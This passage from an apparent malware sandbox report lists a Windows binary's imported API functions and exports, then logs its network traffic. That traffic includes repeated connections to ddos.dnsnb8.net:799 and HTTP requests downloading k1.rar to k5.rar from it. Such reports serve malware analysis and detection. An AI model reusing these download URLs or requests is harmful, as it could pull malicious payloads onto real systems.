0xd83efc SetMenuDefaultItem
0xd83f00 GetDoubleClickTime
0xd83f04 ModifyMenuW
0xd83f0c CharUpperBuffW
0xd83f14 GetUpdateRect
0xd83f18 EnumChildWindows
0xd83f1c DrawMenuBar
0xd83f20 DefFrameProcW
0xd83f24 DefMDIChildProcW
0xd83f2c SubtractRect
0xd83f30 SendNotifyMessageW
0xd83f34 MonitorFromRect
0xd83f38 InSendMessage
0xd83f3c CreateMenu
0xd83f40 WindowFromDC
0xd83f44 GetWindowRgn
0xd83f48 DestroyCursor
0xd83f4c GetDCEx
0xd83f54 RemovePropW
0xd83f58 GetPropW
0xd83f5c SetPropW
0xd83f60 ShowScrollBar
0xd83f64 GetScrollRange
0xd83f68 SetScrollRange
0xd83f6c ScrollWindow
0xd83f70 RedrawWindow
0xd83f74 ValidateRect
0xd83f78 EndPaint
0xd83f7c BeginPaint
0xd83f80 SetForegroundWindow
0xd83f84 GetForegroundWindow
0xd83f88 SetActiveWindow
0xd83f8c UpdateWindow
0xd83f90 GetMenuStringW
0xd83f94 TrackPopupMenuEx
0xd83f98 TrackPopupMenu
0xd83f9c SetMenu
0xd83fa0 GetMenu
0xd83fa4 GetCapture
0xd83fa8 GetDlgCtrlID
0xd83fac GetDlgItem
0xd83fb0 IsIconic
0xd83fb4 IsWindowVisible
0xd83fb8 EndDeferWindowPos
0xd83fbc DeferWindowPos
0xd83fc0 BeginDeferWindowPos
0xd83fc4 SetWindowPlacement
0xd83fc8 GetWindowPlacement
0xd83fcc SetWindowPos
0xd83fd0 DestroyWindow
0xd83fd4 IsChild
0xd83fd8 IsMenu
0xd83fdc CreateWindowExW
0xd83fe0 GetClassInfoExW
0xd83fe4 GetClassInfoW
0xd83fe8 RegisterClassW
0xd83fec CallWindowProcW
0xd83ff0 DefWindowProcW
0xd83ff4 PeekMessageW
0xd83ff8 DispatchMessageW
0xd84000 SetMenuItemInfoW
0xd84008 SetMenuItemBitmaps
0xd8400c EnableMenuItem
0xd84010 CheckMenuItem
0xd84014 GetMenuState
0xd84018 GetSubMenu
0xd8401c GetMenuItemID
0xd84020 SendMessageW
0xd84024 UnregisterClassW
0xd84028 EnableWindow
0xd8402c PostMessageW
0xd84030 GetParent
0xd84034 MessageBoxW
0xd84038 GetKeyState
0xd8403c GetDC
0xd84040 ReleaseDC
0xd84044 LoadBitmapW
0xd84048 GetFocus
0xd8404c OffsetRect
0xd84050 SetRectEmpty
0xd84054 GetClientRect
0xd84058 SendDlgItemMessageA
0xd8405c GetWindow
0xd84060 GetWindowLongW
0xd84068 GetWindowTextW
0xd8406c GetScrollPos
0xd84070 SetScrollPos
0xd84074 SetFocus
0xd84078 RemoveMenu
0xd8407c AppendMenuW
0xd84080 InsertMenuW
0xd84084 GetMenuItemCount
0xd84088 GetCaretPos
0xd8408c GetCursorPos
0xd84090 GetInputState
0xd84094 GetMessageTime
0xd84098 GetMessagePos
0xd8409c GetSystemMetrics
0xd840a0 SendMessageTimeoutW
0xd840a4 IsWindow
0xd840a8 UnregisterClassA
0xd840b0 LoadIconW
0xd840b4 EnableScrollBar
Library GDI32.dll:
0xd83164 CreateHatchBrush
0xd83168 CreatePen
0xd8316c CreatePatternBrush
0xd83170 CreateRectRgn
0xd83174 CreateSolidBrush
0xd83178 DeleteObject
0xd8317c Escape
0xd83180 ExcludeClipRect
0xd83184 GetClipBox
0xd83188 GetClipRgn
0xd83190 GetObjectType
0xd83194 GetPixel
0xd83198 GetStockObject
0xd8319c GetViewportExtEx
0xd831a0 GetWindowExtEx
0xd831a4 IntersectClipRect
0xd831a8 LineTo
0xd831ac OffsetClipRgn
0xd831b0 PlayMetaFile
0xd831b4 PtVisible
0xd831b8 RectVisible
0xd831bc BitBlt
0xd831c0 SaveDC
0xd831c8 ExtSelectClipRgn
0xd831cc SelectObject
0xd831d0 SelectPalette
0xd831d4 SetBkMode
0xd831d8 SetMapperFlags
0xd831dc SetGraphicsMode
0xd831e0 SetMapMode
0xd831e4 SetLayout
0xd831e8 GetLayout
0xd831ec SetPolyFillMode
0xd831f0 SetROP2
0xd831f4 SetStretchBltMode
0xd831fc SetTextAlign
0xd83204 PlayMetaFileRecord
0xd83208 EnumMetaFile
0xd8320c SetWorldTransform
0xd83214 SetColorAdjustment
0xd83218 StartDocW
0xd8321c ArcTo
0xd83220 PolyDraw
0xd83224 SelectClipPath
0xd83228 SelectClipRgn
0xd8322c CreateCompatibleDC
0xd83230 SetArcDirection
0xd83234 ExtCreatePen
0xd83238 MoveToEx
0xd8323c PatBlt
0xd83244 GetObjectW
0xd83248 SetTextColor
0xd8324c SetBkColor
0xd83250 CreateBitmap
0xd83254 DeleteDC
0xd83258 CreateDCW
0xd8325c Ellipse
0xd83260 GetTextColor
0xd83264 CreatePolygonRgn
0xd83268 Polygon
0xd8326c Polyline
0xd83270 CreateRoundRectRgn
0xd83274 LPtoDP
0xd83278 Rectangle
0xd8327c GetRgnBox
0xd83280 OffsetRgn
0xd83284 GetCurrentObject
0xd83288 CreateFontW
0xd8328c GetCharWidthW
0xd83290 StretchDIBits
0xd83294 RoundRect
0xd83298 FillRgn
0xd8329c FrameRgn
0xd832a0 GetBoundsRect
0xd832a4 PtInRegion
0xd832a8 ExtFloodFill
0xd832ac SetPaletteEntries
0xd832b0 SetPixelV
0xd832b4 GetWindowOrgEx
0xd832b8 GetViewportOrgEx
0xd832bc CloseMetaFile
0xd832c0 CreateMetaFileW
0xd832c4 DeleteMetaFile
0xd832c8 EndDoc
0xd832cc StartPage
0xd832d0 EndPage
0xd832d4 AbortDoc
0xd832d8 SetAbortProc
0xd832dc GetROP2
0xd832e0 GetBkMode
0xd832e4 GetNearestColor
0xd832e8 GetPolyFillMode
0xd832ec GetStretchBltMode
0xd832f0 GetTextAlign
0xd832f4 GetTextFaceW
0xd832f8 RestoreDC
0xd832fc TextOutW
0xd83300 ExtTextOutW
0xd83304 PolyBezierTo
0xd83308 PolylineTo
0xd8330c SetViewportExtEx
0xd83310 SetViewportOrgEx
0xd83314 SetWindowExtEx
0xd83318 SetWindowOrgEx
0xd8331c OffsetViewportOrgEx
0xd83320 OffsetWindowOrgEx
0xd83324 ScaleViewportExtEx
0xd83328 ScaleWindowExtEx
0xd83330 GetDeviceCaps
0xd83334 CreateFontIndirectW
0xd83338 GetTextMetricsW
0xd8333c EnumFontFamiliesExW
0xd83340 CombineRgn
0xd83344 GetMapMode
0xd83348 SetRectRgn
0xd8334c DPtoLP
0xd83350 CreatePalette
0xd83358 CopyMetaFileW
0xd8335c GetPaletteEntries
0xd83364 RealizePalette
0xd83368 GetBkColor
0xd83370 CreateDIBitmap
0xd83374 EnumFontFamiliesW
0xd83378 GetTextCharsetInfo
0xd8337c GetDIBits
0xd83380 SetPixel
0xd83384 StretchBlt
0xd83388 CreateDIBSection
0xd8338c SetDIBColorTable
0xd83390 CreateEllipticRgn
Library SHELL32.dll:
0xd83bf4 DragQueryFileW
0xd83bf8 SHGetDesktopFolder
0xd83bfc SHGetMalloc
0xd83c00 SHGetFileInfoW
0xd83c04 ExtractIconW
0xd83c08 SHAddToRecentDocs
0xd83c10 DragFinish
0xd83c14 SHAppBarMessage
0xd83c18 ShellExecuteW
0xd83c1c CommandLineToArgvW
0xd83c20 ShellExecuteExW
0xd83c24 SHBrowseForFolderW
Library ole32.dll:
0xd844a4 CreateItemMoniker
0xd844a8 WriteClassStm
0xd844ac OleCreate
0xd844b0 OleCreateFromData
0xd844bc OleCreateLinkToFile
0xd844c0 OleCreateFromFile
0xd844c4 OleLoad
0xd844c8 OleSave
0xd844cc OleSaveToStream
0xd844d4 OleGetIconOfClass
0xd844dc OleRun
0xd844ec OleIsRunning
0xd844f0 CoGetMalloc
0xd844f4 OleRegEnumVerbs
0xd84500 OleInitialize
0xd84504 OleUninitialize
0xd84508 CoGetClassObject
0xd84510 CoRevokeClassObject
0xd84518 CLSIDFromProgID
0xd8451c OleRegGetMiscStatus
0xd84520 IsAccelerator
0xd8452c StringFromGUID2
0xd84534 CreateFileMoniker
0xd84538 StgIsStorageFile
0xd84540 StgOpenStorage
0xd84544 StgCreateDocfile
0xd84548 CoCreateInstance
0xd8454c CoCreateGuid
0xd84550 SetConvertStg
0xd84554 OleRegGetUserType
0xd84558 ReleaseStgMedium
0xd8455c OleDuplicateData
0xd84560 ReadFmtUserTypeStg
0xd84564 WriteFmtUserTypeStg
0xd84568 WriteClassStg
0xd8456c ReadClassStg
0xd84570 CreateBindCtx
0xd84574 CoTreatAsClass
0xd84578 CoTaskMemAlloc
0xd8457c StringFromCLSID
0xd84580 OleLockRunning
0xd84588 PropVariantCopy
0xd8458c RevokeDragDrop
0xd84590 RegisterDragDrop
0xd84598 OleGetClipboard
0xd8459c DoDragDrop
0xd845a4 OleFlushClipboard
0xd845a8 OleSetClipboard
0xd845b0 CLSIDFromString
0xd845b8 CoDisconnectObject
0xd845bc CoInitializeEx
0xd845c0 CoUninitialize
0xd845c4 CoInitialize
0xd845cc CoTaskMemFree
Library OLEAUT32.dll:
0xd83ad4 SafeArrayPutElement
0xd83ad8 SafeArrayGetElement
0xd83ae0 SafeArrayAccessData
0xd83ae4 SafeArrayUnlock
0xd83aec SafeArrayCopy
0xd83af0 SafeArrayAllocData
0xd83af4 VarCyFromStr
0xd83b00 SysStringLen
0xd83b04 SafeArrayPtrOfIndex
0xd83b08 VariantCopy
0xd83b0c VarDateFromStr
0xd83b10 SafeArrayCreate
0xd83b14 VarBstrFromCy
0xd83b18 VarBstrFromDate
0xd83b1c VarBstrFromDec
0xd83b20 VarDecFromStr
0xd83b24 SysFreeString
0xd83b2c SafeArrayDestroy
0xd83b30 SafeArrayRedim
0xd83b34 SafeArrayGetDim
0xd83b3c SafeArrayLock
0xd83b40 SafeArrayGetUBound
0xd83b44 SysReAllocStringLen
0xd83b48 RegisterTypeLib
0xd83b4c SafeArrayGetLBound
0xd83b54 LoadRegTypeLib
0xd83b58 LoadTypeLib
0xd83b5c SysAllocString
0xd83b60 VariantChangeType
0xd83b64 VariantClear
0xd83b68 VariantInit
0xd83b6c SysAllocStringLen
0xd83b74 SysStringByteLen
Library ADVAPI32.dll:
0xd83000 SetFileSecurityW
0xd83004 GetFileSecurityW
0xd83008 RegEnumKeyExW
0xd8300c RegEnumValueW
0xd83010 RegQueryValueW
0xd83014 RegEnumKeyW
0xd83018 RegDeleteKeyW
0xd8301c RegSetValueW
0xd83020 OpenThreadToken
0xd83024 GetTokenInformation
0xd83028 EqualSid
0xd83030 FreeSid
0xd83034 RegCloseKey
0xd83038 RegQueryValueExW
0xd83044 SetEntriesInAclW
0xd83048 RegCreateKeyExW
0xd8304c RegDeleteValueW
0xd83050 RegOpenKeyExW
0xd83054 RegSetValueExW
0xd83060 ReportEventW
0xd83064 GetLengthSid
0xd83068 CopySid
0xd83078 GetSecurityInfo
0xd8307c IsValidSid
0xd83084 GetSidSubAuthority
0xd8308c LookupAccountSidA
0xd83090 LookupAccountNameA
0xd83094 RegOpenKeyExA
0xd83098 RevertToSelf
0xd8309c LogonUserW
0xd830a8 DuplicateTokenEx
0xd830b0 CryptReleaseContext
0xd830b4 CryptGenRandom
0xd830b8 RegQueryValueExA
0xd830bc CryptGetHashParam
0xd830c0 CryptCreateHash
0xd830c4 CryptHashData
0xd830c8 CryptDestroyHash
0xd830cc CryptDestroyKey
0xd830d0 CryptImportKey
0xd830d4 CryptEncrypt
0xd830d8 OpenProcessToken
Library MSIMG32.dll:
0xd839ec TransparentBlt
0xd839f0 AlphaBlend
Library COMCTL32.dll:
Library UxTheme.dll:
0xd841a8 OpenThemeData
0xd841ac CloseThemeData
0xd841b0 DrawThemeBackground
0xd841b4 GetThemeColor
0xd841b8 GetCurrentThemeName
0xd841bc GetWindowTheme
0xd841c0 IsAppThemed
0xd841c8 GetThemeSysColor
0xd841cc GetThemePartSize
0xd841d0 DrawThemeText
Library oledlg.dll:
0xd84638 OleUIBusyW
Library gdiplus.dll:
0xd843f8 GdiplusShutdown
0xd843fc GdipFree
0xd84400 GdiplusStartup
0xd84404 GdipCloneImage
0xd84408 GdipDisposeImage
0xd84410 GdipGetImageWidth
0xd84414 GdipGetImageHeight
0xd8441c GdipGetImagePalette
0xd84430 GdipDrawImageRectI
0xd84438 GdipCreateFromHDC
0xd84440 GdipDrawImageI
0xd84444 GdipDeleteGraphics
0xd8444c GdipBitmapLockBits
0xd84458 GdipAlloc
Library OLEACC.dll:
0xd83aa4 LresultFromObject

Exports

Ordinal Address Name
1 0x4357b0 ?OnThrowStdException@Debug@MiKTeX@@YAXXZ
2 0x41f1cc _DllGetVersion@4

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49178 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49183 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49184 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49185 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 53658 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar 
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k3.rar 
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k2.rar 
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k5.rar 
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k4.rar 
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.